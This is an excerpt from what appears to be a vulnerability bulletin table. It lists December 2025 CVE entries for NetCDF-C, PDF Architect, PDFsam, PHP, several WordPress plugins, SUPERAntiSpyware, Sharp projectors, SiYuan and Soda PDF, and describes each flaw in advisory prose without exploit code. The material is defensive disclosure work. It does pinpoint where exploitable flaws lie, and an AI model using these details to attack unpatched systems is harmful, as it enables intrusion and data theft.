| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Attribute Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of attribute names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27269. | 2025-12-23 | not yet calculated | CVE-2025-14936 | ZDI-25-1155 |
| Open Design Alliance--ODA Drawings SDK - All Versions < 2026.12 | A Use of Uninitialized Variable vulnerability exists in Open Design Alliance Drawings SDK static versions (mt) before 2026.12. Static object `COdaMfcAppApp theApp` may access `OdString::kEmpty` before its initialization. Due to undefined initialization order of static objects across translation units (Static Initialization Order Fiasco), the application accesses uninitialized memory. This results in application crash on startup, causing denial of service. Due to undefined behavior, memory corruption and potential arbitrary code execution cannot be ruled out in specific exploitation scenarios. | 2025-12-22 | not yet calculated | CVE-2025-10021 | https://www.opendesign.com/security-advisories |
| pavothemes--Bookory | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Bookory bookory allows PHP Local File Inclusion. This issue affects Bookory: from n/a through <= 2.2.7. | 2025-12-24 | not yet calculated | CVE-2025-68530 | https://vdp.patchstack.com/database/Wordpress/Theme/bookory/vulnerability/wordpress-bookory-theme-2-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| pdfforge--PDF Architect | pdfforge PDF Architect DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27503. | 2025-12-23 | not yet calculated | CVE-2025-14416 | ZDI-25-1073 |
| pdfforge--PDF Architect | pdfforge PDF Architect Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27501. | 2025-12-23 | not yet calculated | CVE-2025-14417 | ZDI-25-1074 |
| pdfforge--PDF Architect | pdfforge PDF Architect XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27502. | 2025-12-23 | not yet calculated | CVE-2025-14418 | ZDI-25-1075 |
| pdfforge--PDF Architect | pdfforge PDF Architect PDF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27902. | 2025-12-23 | not yet calculated | CVE-2025-14419 | ZDI-25-1076 |
| pdfforge--PDF Architect | pdfforge PDF Architect CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27514. | 2025-12-23 | not yet calculated | CVE-2025-14420 | ZDI-25-1077 |
| pdfforge--PDF Architect | pdfforge PDF Architect PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27915. | 2025-12-23 | not yet calculated | CVE-2025-14421 | ZDI-25-1078 |
| PDFsam--Enhanced | PDFsam Enhanced App Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of App objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27260. | 2025-12-23 | not yet calculated | CVE-2025-14401 | ZDI-25-1089 |
| PDFsam--Enhanced | PDFsam Enhanced DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27499. | 2025-12-23 | not yet calculated | CVE-2025-14402 | ZDI-25-1090 |
| PDFsam--Enhanced | PDFsam Enhanced Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27500. | 2025-12-23 | not yet calculated | CVE-2025-14403 | ZDI-25-1091 |
| PDFsam--Enhanced | PDFsam Enhanced XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27498. | 2025-12-23 | not yet calculated | CVE-2025-14404 | ZDI-25-1092 |
| PDFsam--Enhanced | PDFsam Enhanced Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows physically-present attackers to escalate privileges on affected installations of PDFsam Enhanced. An attacker must first obtain the ability to mount a malicious drive onto the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27867. | 2025-12-23 | not yet calculated | CVE-2025-14405 | ZDI-25-1093 |
| PHP Group--PHP | In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, the getimagesize() function may leak uninitialized heap memory into the APPn segments (e.g., APP1) when reading images in multi-chunk mode (such as via php://filter). This occurs due to a bug in php_read_stream_all_chunks() that overwrites the buffer without advancing the pointer, leaving tail bytes uninitialized. This may lead to information disclosure of sensitive heap data and affect the confidentiality of the target server. | 2025-12-27 | not yet calculated | CVE-2025-14177 | https://github.com/php/php-src/security/advisories/GHSA-3237-qqm7-mfv7 |
| PHP Group--PHP | In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, when using the PDO PostgreSQL driver with PDO::ATTR_EMULATE_PREPARES enabled, an invalid character sequence (such as \x99) in a prepared statement parameter may cause the quoting function PQescapeStringConn to return NULL, leading to a null pointer dereference in the pdo_parse_params() function. This may lead to crashes (segmentation fault) and affect the availability of the target server. | 2025-12-27 | not yet calculated | CVE-2025-14180 | https://github.com/php/php-src/security/advisories/GHSA-8xr5-qppj-gvwj |
| PickPlugins--Post Grid and Gutenberg Blocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS. This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.18. | 2025-12-24 | not yet calculated | CVE-2025-68605 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pixelgrade--Category Icon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pixelgrade Category Icon category-icon allows Stored XSS. This issue affects Category Icon: from n/a through <= 1.0.2. | 2025-12-24 | not yet calculated | CVE-2025-68525 | https://vdp.patchstack.com/database/Wordpress/Plugin/category-icon/vulnerability/wordpress-category-icon-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pluginsware--Advanced Classifieds & Directory Pro | Cross-Site Request Forgery (CSRF) vulnerability in pluginsware Advanced Classifieds & Directory Pro advanced-classifieds-and-directory-pro allows Cross Site Request Forgery. This issue affects Advanced Classifieds & Directory Pro: from n/a through <= 3.2.9. | 2025-12-24 | not yet calculated | CVE-2025-68580 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-classifieds-and-directory-pro/vulnerability/wordpress-advanced-classifieds-directory-pro-plugin-3-2-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27657. | 2025-12-23 | not yet calculated | CVE-2025-14488 | ZDI-25-1167 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27658. | 2025-12-23 | not yet calculated | CVE-2025-14489 | ZDI-25-1165 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27659. | 2025-12-23 | not yet calculated | CVE-2025-14490 | ZDI-25-1166 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27660. | 2025-12-23 | not yet calculated | CVE-2025-14491 | ZDI-25-1164 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27668. | 2025-12-23 | not yet calculated | CVE-2025-14492 | ZDI-25-1172 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675. | 2025-12-23 | not yet calculated | CVE-2025-14493 | ZDI-25-1170 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27676. | 2025-12-23 | not yet calculated | CVE-2025-14494 | ZDI-25-1163 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27677. | 2025-12-23 | not yet calculated | CVE-2025-14495 | ZDI-25-1169 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27678. | 2025-12-23 | not yet calculated | CVE-2025-14496 | ZDI-25-1171 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27680. | 2025-12-23 | not yet calculated | CVE-2025-14497 | ZDI-25-1168 |
| Rhys Wynne--WP Email Capture | Cross-Site Request Forgery (CSRF) vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Cross Site Request Forgery. This issue affects WP Email Capture: from n/a through <= 3.12.5. | 2025-12-24 | not yet calculated | CVE-2025-68529 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Rustaurius--Five Star Restaurant Reservations | Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Five Star Restaurant Reservations restaurant-reservations allows Cross Site Request Forgery. This issue affects Five Star Restaurant Reservations: from n/a through <= 2.7.7. | 2025-12-24 | not yet calculated | CVE-2025-68601 | https://vdp.patchstack.com/database/Wordpress/Plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SALESmanago--SALESmanago | Missing Authorization vulnerability in SALESmanago SALESmanago salesmanago allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SALESmanago: from n/a through <= 3.9.0. | 2025-12-24 | not yet calculated | CVE-2025-68571 | https://vdp.patchstack.com/database/Wordpress/Plugin/salesmanago/vulnerability/wordpress-salesmanago-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve |
| Sante--PACS Server | Sante PACS Server HTTP Content-Length Header Handling NULL Pointer Dereference Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP Content-Length header. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-26770. | 2025-12-23 | not yet calculated | CVE-2025-14501 | ZDI-25-1104 |
| Scott Paterson--Accept Donations with PayPal | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Scott Paterson Accept Donations with PayPal easy-paypal-donation allows Phishing. This issue affects Accept Donations with PayPal: from n/a through <= 1.5.1. | 2025-12-24 | not yet calculated | CVE-2025-68602 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-paypal-donation/vulnerability/wordpress-accept-donations-with-paypal-plugin-1-5-1-open-redirection-vulnerability?_s_id=cve |
| Senstar--Symphony | Senstar Symphony FetchStoredLicense Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Senstar Symphony. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of FetchStoredLicense method. The issue results from the exposure of sensitive information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26908. | 2025-12-23 | not yet calculated | CVE-2025-12491 | ZDI-25-1060 |
| Sharp Display Solutions, Ltd.--Media Player MP-01 | Missing Authentication for Critical Function vulnerability in Sharp Display Solutions Media Player MP-01 All Versions allows an attacker to access the web interface of the affected product without authentication, change settings or perform other operations, and deliver content from the authoring software to the affected product without authentication. | 2025-12-22 | not yet calculated | CVE-2025-12049 | https://sharp-displays.jp.sharp/global/support/info/MP01-CVE-2025-12049.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Path Traversal vulnerability in Sharp Display Solutions projectors allows an attacker to access and read any files within the projector. | 2025-12-22 | not yet calculated | CVE-2025-11540 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows an attacker to execute arbitrary commands and programs. | 2025-12-22 | not yet calculated | CVE-2025-11541 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows an attacker to execute arbitrary commands and programs. | 2025-12-22 | not yet calculated | CVE-2025-11542 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Improper Validation of Integrity Check Value vulnerability in Sharp Display Solutions projectors allows an attacker to create and run unauthorized firmware. | 2025-12-22 | not yet calculated | CVE-2025-11543 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+, NP-CG6500UL, NP-CG6500WL, NP-CB4500UL, NP-CB4500WL, NP-P525ULH, NP-P525WLH, NP-P605ULH, NP-P554U, NP-P554UG, NP-P554U+, NP-P554W, NP-P554WG, NP-P554W+, NP-P474U, NP-P474UG, NP-P474W, NP-P474WG, NP-P604XG, NP-P604X+, NP-P603XG, NP-P523X+, NP-PE523XG, NP-PE523X+, NP-CF6600U, NP-CF6600W, NP-CF6700X, NP-CF6500X, NP-CB4600U, NP-P554UH, NP-P554WH, NP-P474UH, NP-P474WH, NP-P604XH, NP-P603XH, NP-PE523XH, NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-ME401W, NP-ME361W, NP-ME331W, NP-ME301W, NP-ME401X, NP-ME361X, NP-ME331X, NP-ME301X, NP-ME401WG, NP-ME361WG, NP-ME331WG, NP-ME301WG, NP-ME401XG, NP-ME361XG, NP-ME331XG, NP-ME301XG, NP-CA4155W, NP-CA4350X, NP-CA4255X, NP-CA4155X, NP-CA4115X, NP-MC331WG, NP-MC421XG, NP-MC401XG, NP-MC371XG, NP-MC331XG, NP-MC301XG, NP-CK4155W, NP-CK4255X, NP-CK4155X, NP-CK4055X, NP-CM4150X, NP-CM4050X, NP-CK4155WG, NP-CK4255XG, NP-CK4155XG, NP-CR2165W, NP-CR2305X, NP-CR2275X, NP-CR2165X, NP-CR2155X, NP-CD2115X, NP-CD2105X, NP-CM4151X, NP-CR2276X, NP-CD2116X, NP-P502H, NP-P502W, NP-P452H, NP-P452W | Improper Validation of Integrity Check Value vulnerability in Sharp Display Solutions projectors allows an attacker to create and run unauthorized firmware. | 2025-12-22 | not yet calculated | CVE-2025-11544 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11544.html |
| Sharp Display Solutions, Ltd.--NP-PA1705UL-W, NP-PA1705UL-W+, NP-PA1705UL-B, NP-PA1705UL-B+, NP-PA1505UL-W, NP-PA1505UL-W+, NP-PA1505UL-B, NP-PA1505UL-B+, NP-PA1505UL-BJL, NP-PV800UL-W, NP-PV800UL-W+, NP-PV800UL-B, NP-PV800UL-B+, NP-PV710UL-W, NP-PV710UL-W+, NP-PV710UL-B, NP-PV710UL-B+, NP-PV800UL-W1, NP-PV800UL-B1, NP-PV710UL-W1, NP-PV710UL-B1, NP-PV800UL-B1G, NP-PV710UL-B1G, NP-PV800UL-WH, NP-PV710UL-WH, NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PV710UL+, NP-PA1004UL-W, NP-PA1004UL-WG, NP-PA1004UL-W+, NP-PA1004UL-WH, NP-PA1004UL-B, NP-PA1004UL-BG, NP-PA1004UL-B+, NP-PA804UL-W, NP-PA804UL-WG, NP-PA804UL-W+, NP-PA804UL-WH, NP-PA804UL-B, NP-PA804UL-BG, NP-PA804UL-B+, NP-PA1004UL-BH, NP-PA804UL-BH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-CU4300XD, NP-CU4200XD, NP-CU4200WD, NP-UM383WL, NP-UM383WLG, NP-CJ2200WD, NP-PH3501QL, NP-PH3501QL+, NP-PH2601QL, NP-PH2601QL+, NP-PH350Q40L, NP-PH260Q30L, NP-PX1005QL-W, NP-PX1005QL-B, NP-PX1005QL-B+, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+ | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Sharp Display Solutions projectors allows an attacker to improperly access the HTTP server and execute arbitrary actions. | 2025-12-22 | not yet calculated | CVE-2025-11545 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11545.html |
| siyuan-note--siyuan | SiYuan is self-hosted, open source personal knowledge management software. In versions 3.5.1 and prior, the SiYuan Note application utilizes a hardcoded cryptographic secret for its session store. This unsafe practice renders the session encryption ineffective. Since the sensitive AccessAuthCode is stored within the session cookie, an attacker who intercepts or obtains a user's encrypted session cookie (e.g., via session hijacking) can locally decrypt it using the public key. Once decrypted, the attacker can retrieve the AccessAuthCode in plain text and use it to authenticate or take over the session. | 2025-12-27 | not yet calculated | CVE-2025-68948 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f7ph-rc3w-qp28 |
| Soda PDF--Desktop | Soda PDF Desktop Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Soda PDF Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25793. | 2025-12-23 | not yet calculated | CVE-2025-14406 | ZDI-25-1079 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141. | 2025-12-23 | not yet calculated | CVE-2025-14407 | ZDI-25-1080 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27143. | 2025-12-23 | not yet calculated | CVE-2025-14408 | ZDI-25-1081 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27120. | 2025-12-23 | not yet calculated | CVE-2025-14409 | ZDI-25-1082 |
